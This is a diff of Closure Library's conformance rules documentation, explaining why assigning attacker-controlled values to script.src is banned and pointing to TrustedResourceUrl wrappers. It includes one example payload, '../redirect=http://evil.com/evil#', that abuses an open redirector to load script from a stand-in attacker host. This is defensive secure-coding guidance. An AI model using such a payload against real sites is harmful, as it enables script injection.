tntim96/closure-web-stack/closure-library/doc/develop/conformance_rules.md

 is a security risk and is banned.
 Attacker controlled values assigned to these properties can result in loading code from an untrusted domain.
-For example, the following would be unsafe if www.google.com were to have an open redirector and attackerControlled were something like `'../redirect=http://evil.com/evil#'`:
+For example, the following would be unsafe if www.google.com were to have an open redirector and attackerControlled were something like '../redirect=http://evil.com/evil#':

 ```js
 script.src = 'https://www.google.com/module/' + attackerControlled + '.js';
 ```

-Instead of directly assigning to these properties use safe wrapper functions which take `TrustedResourceUrl`, such as `goog.dom.safe.setScriptSrc`.
+Instead of directly assigning to these properties use safe wrapper functions which take TrustedResourceUrl, such as goog.dom.safe.setScriptSrc.

 Note: Reads of this property are permitted.

 {: #createDom}
 ### Assigning a variable to a dangerous property via createDom is forbidden.